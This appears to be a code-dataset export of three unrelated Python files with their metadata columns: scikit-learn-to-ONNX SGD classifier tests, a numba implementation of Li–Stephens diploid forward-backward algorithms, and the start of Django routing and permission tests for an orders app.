model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiLogL1NoIntercept-Dec4",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_elasticnet_power_t(self):
model, X = fit_classification_model(
SGDClassifier(penalty='elasticnet', l1_ratio=0.3,
power_t=2, random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinaryElasticnetPowerT-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_elasticnet_power_t(self):
model, X = fit_classification_model(
SGDClassifier(penalty='elasticnet', l1_ratio=0.3,
power_t=2, random_state=42), 5)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiElasticnetPowerT-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_squared_hinge(self):
model, X = fit_classification_model(
SGDClassifier(loss='squared_hinge', random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinarySquaredHinge-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_squared_hinge(self):
model, X = fit_classification_model(
SGDClassifier(loss='squared_hinge', random_state=42), 5)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiSquaredHinge-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_perceptron(self):
model, X = fit_classification_model(
SGDClassifier(loss='perceptron', random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinaryPerceptron-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_perceptron(self):
model, X = fit_classification_model(
SGDClassifier(loss='perceptron', random_state=42), 5)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiPerceptron-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_hinge_int(self):
model, X = fit_classification_model(
SGDClassifier(loss='hinge', random_state=42), 2, is_int=True)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", Int64TensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnSGDClassifierBinaryHingeInt-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_hinge_int(self):
model, X = fit_classification_model(
SGDClassifier(loss='hinge', random_state=42), 5, is_int=True)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", Int64TensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnSGDClassifierMultiHingeInt-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_log_int(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', random_state=42), 2, is_int=True)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", Int64TensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnSGDClassifierBinaryLogInt",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_log_int(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', random_state=42), 5, is_int=True)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", Int64TensorType([None, X.shape[1]]))],
)
X = X[6:8]
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnSGDClassifierMultiLogInt",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_multi_class_nocl(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', random_state=42),
2, label_string=True)
model_onnx = convert_sklearn(
model,
"multi-class nocl",
[("input", FloatTensorType([None, X.shape[1]]))],
options={id(model): {'nocl': True}})
self.assertIsNotNone(model_onnx)
sonx = str(model_onnx)
assert 'classlabels_strings' not in sonx
assert 'cl0' not in sonx
dump_data_and_model(
X[6:8], model, model_onnx, classes=model.classes_,
basename="SklearnSGDMultiNoCl", verbose=False,
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')")
if __name__ == "__main__":
unittest.main()
| 41.061758
| 79
| 0.559727
| 1,630
| 17,287
| 5.604908
| 0.076687
| 0.054181
| 0.027036
| 0.031195
| 0.880363
| 0.878284
| 0.867666
| 0.867666
| 0.861756
| 0.861756
| 0
| 0.020627
| 0.332562
| 17,287
| 420
| 80
| 41.159524
| 0.771191
| 0.002603
| 0
| 0.729798
| 0
| 0
| 0.245997
| 0.133326
| 0
| 0
| 0
| 0
| 0.050505
| 1
| 0.045455
| false
| 0
| 0.017677
| 0
| 0.065657
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
604ee103a6394a9ea00cd37763ba4d5e6ceab2e1
| 15,433
|
py
|
Python
|
lshmm/forward_backward/fb_diploid_samples_variants.py
|
jeromekelleher/lshmm
|
58e0c3395f222e756bb10a0063f5118b20176a01
|
[
"MIT"
] | null | null | null |
lshmm/forward_backward/fb_diploid_samples_variants.py
|
jeromekelleher/lshmm
|
58e0c3395f222e756bb10a0063f5118b20176a01
|
[
"MIT"
] | null | null | null |
lshmm/forward_backward/fb_diploid_samples_variants.py
|
jeromekelleher/lshmm
|
58e0c3395f222e756bb10a0063f5118b20176a01
|
[
"MIT"
] | null | null | null |
"""Collection of functions to run forwards and backwards algorithms on diploid genotype data, where the data is structured as samples x variants."""
import numba as nb
import numpy as np
EQUAL_BOTH_HOM = 4
UNEQUAL_BOTH_HOM = 0
BOTH_HET = 7
REF_HOM_OBS_HET = 1
REF_HET_OBS_HOM = 2
# https://github.com/numba/numba/issues/1269
@nb.njit
def np_apply_along_axis(func1d, axis, arr):
"""Create numpy-like functions for max, sum etc."""
assert arr.ndim == 2
assert axis in [0, 1]
if axis == 0:
result = np.empty(arr.shape[1])
for i in range(len(result)):
result[i] = func1d(arr[:, i])
else:
result = np.empty(arr.shape[0])
for i in range(len(result)):
result[i] = func1d(arr[i, :])
return result
@nb.njit
def np_amax(array, axis):
"""Numba implementation of numpy vectorised maximum."""
return np_apply_along_axis(np.amax, axis, array)
@nb.njit
def np_sum(array, axis):
"""Numba implementation of numpy vectorised sum."""
return np_apply_along_axis(np.sum, axis, array)
@nb.njit
def np_argmax(array, axis):
"""Numba implementation of numpy vectorised argmax."""
return np_apply_along_axis(np.argmax, axis, array)
@nb.jit
def forwards_ls_dip(n, m, G, s, e, r, norm=True):
"""Matrix based diploid LS forward algorithm using numpy vectorisation."""
# Initialise the forward tensor
F = np.zeros((n, n, m))
F[:, :, 0] = 1 / (n ** 2)
index = 4 * np.equal(G[:, :, 0], s[0, 0]).astype(np.int64) + 2 * (
G[:, :, 0] == 1
).astype(np.int64)
if s[0, 0] == 1:
index += 1
F[:, :, 0] *= e[index.ravel(), 0].reshape(n, n)
c = np.ones(m)
r_n = r / n
if norm:
c[0] = np.sum(F[:, :, 0])
F[:, :, 0] *= 1 / c[0]
# Forwards
for l in range(1, m):
index = 4 * np.equal(G[:, :, l], s[0, l]).astype(np.int64) + 2 * (
G[:, :, l] == 1
).astype(np.int64)
if s[0, l] == 1:
index += 1
# No change in both
F[:, :, l] = (1 - r[l]) ** 2 * F[:, :, l - 1]
# Both change
F[:, :, l] += (r_n[l]) ** 2
# One changes
sum_j = np_sum(F[:, :, l - 1], 0).repeat(n).reshape((-1, n))
F[:, :, l] += ((1 - r[l]) * r_n[l]) * (sum_j + sum_j.T)
# Emission
F[:, :, l] *= e[index.ravel(), l].reshape(n, n)
c[l] = np.sum(F[:, :, l])
F[:, :, l] *= 1 / c[l]
ll = np.sum(np.log10(c))
else:
# Forwards
for l in range(1, m):
index = 4 * np.equal(G[:, :, l], s[0, l]).astype(np.int64) + 2 * (
G[:, :, l] == 1
).astype(np.int64)
if s[0, l] == 1:
index += 1
# No change in both
F[:, :, l] = (1 - r[l]) ** 2 * F[:, :, l - 1]
# Both change
F[:, :, l] += (r_n[l]) ** 2 * np.sum(F[:, :, l - 1])
# One changes
sum_j = np_sum(F[:, :, l - 1], 0).repeat(n).reshape((-1, n)).T
F[:, :, l] += ((1 - r[l]) * r_n[l]) * (sum_j + sum_j.T)
# Emission
F[:, :, l] *= e[index.ravel(), l].reshape(n, n)
ll = np.log10(np.sum(F[:, :, l]))
return F, c, ll
@nb.jit
def backwards_ls_dip(n, m, G, s, e, c, r):
"""Matrix based diploid LS backward algorithm using numpy vectorisation."""
# Initialise the backward tensor
B = np.zeros((n, n, m))
# Initialise
B[:, :, m - 1] = 1
r_n = r / n
# Backwards
for l in range(m - 2, -1, -1):
index = (
4 * np.equal(G[:, :, l + 1], s[0, l + 1]).astype(np.int64)
+ 2 * (G[:, :, l + 1] == 1).astype(np.int64)
+ np.int64(s[0, l + 1] == 1)
).ravel()
# Both change
B[:, :, l] = r_n[l + 1] ** 2 * np.sum(
e[index, l + 1].reshape(n, n) * B[:, :, l + 1]
)
# No change in both
B[:, :, l] += (
(1 - r[l + 1]) ** 2 * B[:, :, l + 1] * e[index, l + 1].reshape(n, n)
)
sum_j = (
np_sum(B[:, :, l + 1] * e[index, l + 1].reshape(n, n), 0)
.repeat(n)
.reshape((-1, n))
)
B[:, :, l] += ((1 - r[l + 1]) * r_n[l + 1]) * (sum_j + sum_j.T)
B[:, :, l] *= 1 / c[l + 1]
return B
@nb.jit
def forward_ls_dip_starting_point(n, m, G, s, e, r):
"""Naive implementation of LS diploid forwards algorithm."""
# Initialise the forward tensor
F = np.zeros((n, n, m))
F[:, :, 0] = 1 / (n ** 2)
index = (
4 * np.equal(G[:, :, 0], s[0, 0]).astype(np.int64)
+ 2 * (G[:, :, 0] == 1).astype(np.int64)
+ np.int64(s[0, 0] == 1)
)
F[:, :, 0] *= e[index.ravel(), 0].reshape(n, n)
r_n = r / n
for l in range(1, m):
# Determine the various components
F_no_change = np.zeros((n, n))
F_j1_change = np.zeros(n)
F_j2_change = np.zeros(n)
F_both_change = 0
for j1 in range(n):
for j2 in range(n):
F_no_change[j1, j2] = (1 - r[l]) ** 2 * F[j1, j2, l - 1]
for j1 in range(n):
for j2 in range(n):
F_both_change += r_n[l] ** 2 * F[j1, j2, l - 1]
for j1 in range(n):
for j2 in range(n): # This is the variable to sum over - it changes
F_j2_change[j1] += (1 - r[l]) * r_n[l] * F[j1, j2, l - 1]
for j2 in range(n):
for j1 in range(n): # This is the variable to sum over - it changes
F_j1_change[j2] += (1 - r[l]) * r_n[l] * F[j1, j2, l - 1]
F[:, :, l] = F_both_change
for j1 in range(n):
F[j1, :, l] += F_j2_change
for j2 in range(n):
F[:, j2, l] += F_j1_change
for j1 in range(n):
for j2 in range(n):
F[j1, j2, l] += F_no_change[j1, j2]
for j1 in range(n):
for j2 in range(n):
# What is the emission?
if s[0, l] == 1:
# OBS is het
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[BOTH_HET, l]
else: # REF is hom
F[j1, j2, l] *= e[REF_HOM_OBS_HET, l]
else:
# OBS is hom
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[REF_HET_OBS_HOM, l]
else: # REF is hom
if G[j1, j2, l] == s[0, l]: # Equal
F[j1, j2, l] *= e[EQUAL_BOTH_HOM, l]
else: # Unequal
F[j1, j2, l] *= e[UNEQUAL_BOTH_HOM, l]
ll = np.log10(np.sum(F[:, :, l]))
return F, ll
@nb.jit
def backward_ls_dip_starting_point(n, m, G, s, e, r):
"""Naive implementation of LS diploid backwards algorithm."""
# Backwards
B = np.zeros((n, n, m))
# Initialise
B[:, :, m - 1] = 1
r_n = r / n
for l in range(m - 2, -1, -1):
# Determine the various components
B_no_change = np.zeros((n, n))
B_j1_change = np.zeros(n)
B_j2_change = np.zeros(n)
B_both_change = 0
# Evaluate the emission matrix at this site, for all pairs
e_tmp = np.zeros((n, n))
for j1 in range(n):
for j2 in range(n):
# What is the emission?
if s[0, l + 1] == 1:
# OBS is het
if G[j1, j2, l + 1] == 1: # REF is het
e_tmp[j1, j2] = e[BOTH_HET, l + 1]
else: # REF is hom
e_tmp[j1, j2] = e[REF_HOM_OBS_HET, l + 1]
else:
# OBS is hom
if G[j1, j2, l + 1] == 1: # REF is het
e_tmp[j1, j2] = e[REF_HET_OBS_HOM, l + 1]
else: # REF is hom
if G[j1, j2, l + 1] == s[0, l + 1]: # Equal
e_tmp[j1, j2] = e[EQUAL_BOTH_HOM, l + 1]
else: # Unequal
e_tmp[j1, j2] = e[UNEQUAL_BOTH_HOM, l + 1]
for j1 in range(n):
for j2 in range(n):
B_no_change[j1, j2] = (
(1 - r[l + 1]) ** 2 * B[j1, j2, l + 1] * e_tmp[j1, j2]
)
for j1 in range(n):
for j2 in range(n):
B_both_change += r_n[l + 1] ** 2 * e_tmp[j1, j2] * B[j1, j2, l + 1]
for j1 in range(n):
for j2 in range(n): # This is the variable to sum over - it changes
B_j2_change[j1] += (
(1 - r[l + 1]) * r_n[l + 1] * B[j1, j2, l + 1] * e_tmp[j1, j2]
)
for j2 in range(n):
for j1 in range(n): # This is the variable to sum over - it changes
B_j1_change[j2] += (
(1 - r[l + 1]) * r_n[l + 1] * B[j1, j2, l + 1] * e_tmp[j1, j2]
)
B[:, :, l] = B_both_change
for j1 in range(n):
B[j1, :, l] += B_j2_change
for j2 in range(n):
B[:, j2, l] += B_j1_change
for j1 in range(n):
for j2 in range(n):
B[j1, j2, l] += B_no_change[j1, j2]
return B
@nb.jit
def forward_ls_dip_loop(n, m, G, s, e, r, norm=True):
"""LS diploid forwards algoritm without vectorisation."""
# Initialise the forward tensor
F = np.zeros((n, n, m))
F[:, :, 0] = 1 / (n ** 2)
index = (
4 * np.equal(G[:, :, 0], s[0, 0]).astype(np.int64)
+ 2 * (G[:, :, 0] == 1).astype(np.int64)
+ np.int64(s[0, 0] == 1)
)
F[:, :, 0] *= e[index.ravel(), 0].reshape(n, n)
r_n = r / n
c = np.ones(m)
if norm:
c[0] = np.sum(F[:, :, 0])
F[:, :, 0] *= 1 / c[0]
for l in range(1, m):
# Determine the various components
F_no_change = np.zeros((n, n))
F_j_change = np.zeros(n)
for j1 in range(n):
for j2 in range(n):
F_no_change[j1, j2] = (1 - r[l]) ** 2 * F[j1, j2, l - 1]
F_j_change[j1] += (1 - r[l]) * r_n[l] * F[j2, j1, l - 1]
F[:, :, l] = r_n[l] ** 2
for j1 in range(n):
F[j1, :, l] += F_j_change
F[:, j1, l] += F_j_change
for j2 in range(n):
F[j1, j2, l] += F_no_change[j1, j2]
for j1 in range(n):
for j2 in range(n):
# What is the emission?
if s[0, l] == 1:
# OBS is het
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[BOTH_HET, l]
else: # REF is hom
F[j1, j2, l] *= e[REF_HOM_OBS_HET, l]
else:
# OBS is hom
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[REF_HET_OBS_HOM, l]
else: # REF is hom
if G[j1, j2, l] == s[0, l]: # Equal
F[j1, j2, l] *= e[EQUAL_BOTH_HOM, l]
else: # Unequal
F[j1, j2, l] *= e[UNEQUAL_BOTH_HOM, l]
c[l] = np.sum(F[:, :, l])
F[:, :, l] *= 1 / c[l]
ll = np.sum(np.log10(c))
else:
for l in range(1, m):
# Determine the various components
F_no_change = np.zeros((n, n))
F_j1_change = np.zeros(n)
F_j2_change = np.zeros(n)
F_both_change = 0
for j1 in range(n):
for j2 in range(n):
F_no_change[j1, j2] = (1 - r[l]) ** 2 * F[j1, j2, l - 1]
F_j1_change[j1] += (1 - r[l]) * r_n[l] * F[j2, j1, l - 1]
F_j2_change[j1] += (1 - r[l]) * r_n[l] * F[j1, j2, l - 1]
F_both_change += r_n[l] ** 2 * F[j1, j2, l - 1]
F[:, :, l] = F_both_change
for j1 in range(n):
F[j1, :, l] += F_j2_change
F[:, j1, l] += F_j1_change
for j2 in range(n):
F[j1, j2, l] += F_no_change[j1, j2]
for j1 in range(n):
for j2 in range(n):
# What is the emission?
if s[0, l] == 1:
# OBS is het
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[BOTH_HET, l]
else: # REF is hom
F[j1, j2, l] *= e[REF_HOM_OBS_HET, l]
else:
# OBS is hom
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[REF_HET_OBS_HOM, l]
else: # REF is hom
if G[j1, j2, l] == s[0, l]: # Equal
F[j1, j2, l] *= e[EQUAL_BOTH_HOM, l]
else: # Unequal
F[j1, j2, l] *= e[UNEQUAL_BOTH_HOM, l]
ll = np.log10(np.sum(F[:, :, l]))
return F, c, ll
@nb.jit
def backward_ls_dip_loop(n, m, G, s, e, c, r):
"""LS diploid backwards algoritm without vectorisation."""
# Initialise the backward tensor
B = np.zeros((n, n, m))
B[:, :, m - 1] = 1
r_n = r / n
for l in range(m - 2, -1, -1):
# Determine the various components
B_no_change = np.zeros((n, n))
B_j_change = np.zeros(n)
B_both_change = 0
# Evaluate the emission matrix at this site, for all pairs
e_tmp = np.zeros((n, n))
for j1 in range(n):
for j2 in range(n):
# What is the emission?
if s[0, l + 1] == 1:
# OBS is het
if G[j1, j2, l + 1] == 1: # REF is het
e_tmp[j1, j2] = e[BOTH_HET, l + 1]
else: # REF is hom
e_tmp[j1, j2] = e[REF_HOM_OBS_HET, l + 1]
else:
# OBS is hom
if G[j1, j2, l + 1] == 1: # REF is het
e_tmp[j1, j2] = e[REF_HET_OBS_HOM, l + 1]
else: # REF is hom
if G[j1, j2, l + 1] == s[0, l + 1]: # Equal
e_tmp[j1, j2] = e[EQUAL_BOTH_HOM, l + 1]
else: # Unequal
e_tmp[j1, j2] = e[UNEQUAL_BOTH_HOM, l + 1]
for j1 in range(n):
for j2 in range(n):
B_no_change[j1, j2] = (
(1 - r[l + 1]) ** 2 * B[j1, j2, l + 1] * e_tmp[j1, j2]
)
B_j_change[j1] += (
(1 - r[l + 1]) * r_n[l + 1] * B[j1, j2, l + 1] * e_tmp[j1, j2]
)
B_both_change += r_n[l + 1] ** 2 * e_tmp[j1, j2] * B[j1, j2, l + 1]
B[:, :, l] = B_both_change
for j1 in range(n):
B[:, j1, l] += B_j_change
B[j1, :, l] += B_j_change
for j2 in range(n):
B[j1, j2, l] += B_no_change[j1, j2]
B[:, :, l] *= 1 / c[l + 1]
return B
| 32.219207
| 148
| 0.404717
| 2,331
| 15,433
| 2.567568
| 0.058773
| 0.030409
| 0.041771
| 0.027068
| 0.89056
| 0.861988
| 0.820384
| 0.776608
| 0.749875
| 0.746867
| 0
| 0.061659
| 0.436727
| 15,433
| 478
| 149
| 32.286611
| 0.626826
| 0.132767
| 0
| 0.760736
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006135
| 1
| 0.030675
| false
| 0
| 0.006135
| 0
| 0.067485
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60b3f693e61171f630f0565af5f3b0a5add7c20c
| 35,716
|
py
|
Python
|
src/tests/orders/testView.py
|
c3loc/squirrel
|
8074dbc74a9a15fc665fcaef617b401759ea7e0c
|
[
"MIT"
] | 1
|
2019-12-13T13:22:06.000Z
|
2019-12-13T13:22:06.000Z
|
src/tests/orders/testView.py
|
c3loc/squirrel
|
8074dbc74a9a15fc665fcaef617b401759ea7e0c
|
[
"MIT"
] | 23
|
2019-12-05T23:18:46.000Z
|
2020-04-13T14:08:22.000Z
|
src/tests/orders/testView.py
|
c3loc/squirrel
|
8074dbc74a9a15fc665fcaef617b401759ea7e0c
|
[
"MIT"
] | 2
|
2019-12-06T08:14:31.000Z
|
2020-06-18T20:30:26.000Z
|
from test.support import EnvironmentVarGuard
from django.contrib.auth.models import Permission, User
from django.test import TestCase
from django.urls import resolve
from squirrel.orders import views
from squirrel.orders.models import Event, Order, Product, Team, Vendor
class RoutingTests(TestCase):
"""Test routing of all urlpatterns"""
def test_orders_resolves_orders(self):
view = resolve("/orders")
self.assertEqual(view.url_name, "orders")
def test_new_order_resolves_new_order(self):
view = resolve("/orders/new")
self.assertEqual(view.func, views.order)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_order_resolves_order(self):
view = resolve("/orders/23")
self.assertEqual(view.func, views.order)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"order_id": 23})
def test_delete_order_resolves_delete_order(self):
view = resolve("/orders/delete/19")
self.assertEqual(view.func, views.delete_order)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"order_id": 19})
def test_new_event_resolves_new_event(self):
view = resolve("/events/new")
self.assertEqual(view.func, views.event)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_event_resolves_event(self):
view = resolve("/events/23")
self.assertEqual(view.func, views.event)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"event_id": 23})
def test_delete_event_resolves_delete_event(self):
view = resolve("/events/delete/19")
self.assertEqual(view.func, views.delete_event)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"event_id": 19})
def test_products_resolves_products(self):
view = resolve("/products")
self.assertEqual(view.url_name, "products")
def test_new_product_resolves_new_product(self):
view = resolve("/products/new")
self.assertEqual(view.func, views.product)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_product_resolves_product(self):
view = resolve("/products/17")
self.assertEqual(view.func, views.product)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"product_id": 17})
def test_delete_product_resolves_delete_product(self):
view = resolve("/products/delete/12")
self.assertEqual(view.func, views.delete_product)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"product_id": 12})
def test_teams_resolves_teams(self):
view = resolve("/teams")
self.assertEqual(view.url_name, "teams")
def test_new_team_resolves_new_team(self):
view = resolve("/teams/new")
self.assertEqual(view.func, views.team)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_team_resolves_team(self):
view = resolve("/teams/17")
self.assertEqual(view.func, views.team)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"team_id": 17})
def test_delete_team_resolves_delete_team(self):
view = resolve("/teams/delete/12")
self.assertEqual(view.func, views.delete_team)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"team_id": 12})
def test_purchases_resolves_purchases(self):
view = resolve("/purchases")
self.assertEqual(view.url_name, "purchases")
def test_new_purchase_resolves_new_purchase(self):
view = resolve("/purchases/new")
self.assertEqual(view.func, views.purchase)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_purchase_resolves_purchase(self):
view = resolve("/purchases/17")
self.assertEqual(view.func, views.purchase)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"purchase_id": 17})
def test_delete_purchase_resolves_delete_purchase(self):
view = resolve("/purchases/delete/12")
self.assertEqual(view.func, views.delete_purchase)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"purchase_id": 12})
def test_stockpiles_resolves_stockpiles(self):
view = resolve("/stockpiles")
self.assertEqual(view.url_name, "stockpiles")
def test_new_stockpile_resolves_new_stockpile(self):
view = resolve("/stockpiles/new")
self.assertEqual(view.func, views.stockpile)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_stockpile_resolves_stockpile(self):
view = resolve("/stockpiles/17")
self.assertEqual(view.func, views.stockpile)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"stockpile_id": 17})
def test_delete_stockpile_resolves_delete_stockpile(self):
view = resolve("/stockpiles/delete/12")
self.assertEqual(view.func, views.delete_stockpile)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"stockpile_id": 12})
def test_pillages_resolves_pillages(self):
view = resolve("/pillages")
self.assertEqual(view.url_name, "pillages")
def test_new_pillage_resolves_new_pillage(self):
view = resolve("/pillages/new")
self.assertEqual(view.func, views.pillage)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_pillage_resolves_pillage(self):
view = resolve("/pillages/17")
self.assertEqual(view.func, views.pillage)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"pillage_id": 17})
def test_delete_pillage_resolves_delete_pillage(self):
view = resolve("/pillages/delete/12")
self.assertEqual(view.func, views.delete_pillage)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"pillage_id": 12})
class OrderViewTests(TestCase):
def setUp(self) -> None:
# Various permission objects for convinience use
self.team_permission = Permission.objects.get(codename="view_team")
self.request_permission = Permission.objects.get(codename="request_order")
self.approve_permission = Permission.objects.get(codename="approve_order")
self.receive_permission = Permission.objects.get(codename="receive_order")
self.complete_permission = Permission.objects.get(codename="complete_order")
self.view_permission = Permission.objects.get(codename="view_order")
self.view_all_teams_permission = Permission.objects.get(
codename="view_order_all_teams"
)
self.add_permission = Permission.objects.get(codename="add_order")
self.add_all_teams_permission = Permission.objects.get(
codename="add_order_all_teams"
)
self.change_permission = Permission.objects.get(codename="change_order")
self.change_all_teams_permission = Permission.objects.get(
codename="change_order_all_teams"
)
self.delete_permission = Permission.objects.get(codename="delete_order")
self.delete_all_teams_permission = Permission.objects.get(
codename="delete_order_all_teams"
)
self.team_a = Team.objects.create(name="The A-Team")
self.team_b = Team.objects.create(name="Not the A-Team")
self.product = Product.objects.create(name="Dr. Cave Johnson")
# a user without any permission
self.user = User.objects.create_user("engel", password="engel")
# a user with view permission, and can see teams
self.view_user = User.objects.create_user("loc_engel", password="loc_engel")
self.view_user.user_permissions.add(self.view_permission)
self.view_user.user_permissions.add(self.team_permission)
self.eventA = Event.objects.create(name="Required Event")
def post_order(self, id="new", state="REQ", amount=1, comment="", event=1):
return self.client.post(
"/orders/{}".format(id),
{
"amount": amount,
"product": self.product.id,
"team": self.team_a.id,
"state": state,
